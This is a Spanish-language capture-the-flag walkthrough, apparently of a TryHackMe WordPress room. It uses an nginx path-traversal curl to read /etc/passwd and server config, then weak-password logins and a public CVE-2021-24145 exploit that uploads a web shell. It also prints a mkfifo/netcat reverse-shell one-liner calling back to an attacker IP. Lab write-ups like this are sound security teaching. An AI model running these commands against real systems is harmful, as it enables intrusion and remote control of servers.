Alpinista (Wordpress)

Directory Traversal (también conocida como Path Traversal).

                                                                                                        
┌──(docker㉿docker)-[~/Tryhackme]
└─$ curl "http://mountaineer.thm/wordpress/images../etc/passwd" -s -q | grep 'sh$'

root:x:0:0:root:/root:/bin/bash
vagrant:x:1000:1000:vagrant:/home/vagrant:/bin/bash
manaslu:x:1002:1002::/home/manaslu:/bin/bash
annapurna:x:1003:1003::/home/annapurna:/bin/bash
makalu:x:1004:1004::/home/makalu:/bin/bash
kangchenjunga:x:1006:1006::/home/kangchenjunga:/bin/bash
everest:x:1010:1010::/home/everest:/bin/bash
lhotse:x:1011:1011::/home/lhotse:/bin/bash
nanga:x:1012:1012::/home/nanga:/bin/bash
k2:x:1013:1013::/home/k2:/bin/bash

Punto de apoyo inicial

Aprovechando esta vulnerabilidad, filtramos los archivos de configuración de nginx y descubrimos dónde se encuentra la vulnerabilidad y otra cosa interesante: un subdominio.

──(docker㉿docker)-[~/Tryhackme]
└─$ curl http://mountaineer.thm/wordpress/images../etc/nginx/sites-available/default -s -q 
##
# You should look at the following URL's in order to grasp a solid understanding
# of Nginx configuration files in order to fully unleash the power of Nginx.
# https://www.nginx.com/resources/wiki/start/
# https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
# https://wiki.debian.org/Nginx/DirectoryStructure
#
# In most cases, administrators will remove this file from sites-enabled/ and
# leave it as reference inside of sites-available where it will continue to be
# updated by the nginx packaging team.
#
# This file will automatically load configuration files provided by other
# applications, such as Drupal or Wordpress. These applications will be made
# available underneath a path with that package name, such as /drupal8.
#
# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
##

# Default server configuration
#
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        server_name mountaineer.thm adminroundcubemail.mountaineer.thm;
        client_max_body_size 20M;
        # SSL configuration
        #
        # listen 443 ssl default_server;
        # listen [::]:443 ssl default_server;
        #
        # Note: You should disable gzip for SSL traffic.
        # See: https://bugs.debian.org/773332
        #
        # Read up on ssl_ciphers to ensure a secure configuration.
        # See: https://bugs.debian.org/765782
        #
        # Self signed certs generated by the ssl-cert package
        # Don't use them in a production server!
        #
        # include snippets/snakeoil.conf;

        root /var/www/html;

        # Add index.php to the list if you are using PHP
        index index.php index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                # First attempt to serve request as file, then
                # as directory, then fall back to displaying a 404.
                # try_files $uri $uri/ =404;
                try_files $uri $uri/ /index.php?$args;
        }

        # pass PHP scripts to FastCGI server
        #
        location ~ \.php$ {
               include snippets/fastcgi-php.conf;
        #
        #       # With php-fpm (or other unix sockets):
               fastcgi_pass unix:/run/php/php8.1-fpm.sock;
        #       # With php-cgi (or other tcp sockets):
        #       fastcgi_pass 127.0.0.1:9000;
        }

        location /wordpress/images {
            alias /media/;
        }

        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        #location ~ /\.ht {
        #       deny all;
        #}
}


# Virtual Host configuration for example.com
#
# You can move that to a different file under sites-available/ and symlink that
# to sites-enabled/ to enable it.
#
#server {
#       listen 80;
#       listen [::]:80;
#
#       server_name example.com;
#
#       root /var/www/example.com;
#       index index.html;
#
#       location / {
#               try_files $uri $uri/ =404;
#       }
#}
Entramos al muevo subdominio

Después de probar un par de contraseñas débiles para los nombres de usuario que descubrimos, iniciamos sesión exitosamente usando k2:k2.

Primero, revisando el correo electrónico titulado To my favorite mountain out thereen nuestra bandeja de entrada, obtenemos una contraseña.

Una vez adentro del wordprees usamos:

LogoExploits/Wordpress/CVE-2021-24145 at main · Hacker5preme/ExploitsGitHub

Al usalrlo:

┌──(docker㉿docker)-[~/Tryhackme]
└─$ python3 exploit.py -T 10.10.148.234 -P 80 -U /wordpress/ -u K2 -p th3_tall3st_password_in_th3_world

  ______     _______     ____   ___ ____  _      ____  _  _   _ _  _  ____  
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \| || | / | || || ___| 
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \ 
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _| |__   _|__) |
 \____|  \_/  |_____|   |_____|\___/_____|_|    |_____|  |_| |_|  |_||____/ 
                                
                * Wordpress Plugin Modern Events Calendar Lite RCE                                                        
                * @Hacker5preme
                    




[+] Authentication successfull !

[+] Shell Uploaded to: http://10.10.148.234:80/wordpress//wp-content/uploads/shell.php

Hacemos click al shell.php

Para llevarlo a vuestra maquina usamos el comando:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.0.60 443 >/tmp/f

Y en esucha:

┌──(docker㉿docker)-[~/Tryhackme]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.0.60] from (UNKNOWN) [10.10.148.234] 52422
/bin/sh: 0: can't access tty; job control turned off
$ ls
annapurna
everest
k2
kangchenjunga
lhotse
makalu
manaslu
nanga
vagrant
$

PreviousCTF simple (SUID VIM)NextCiberLente(msfconsole )

Last updated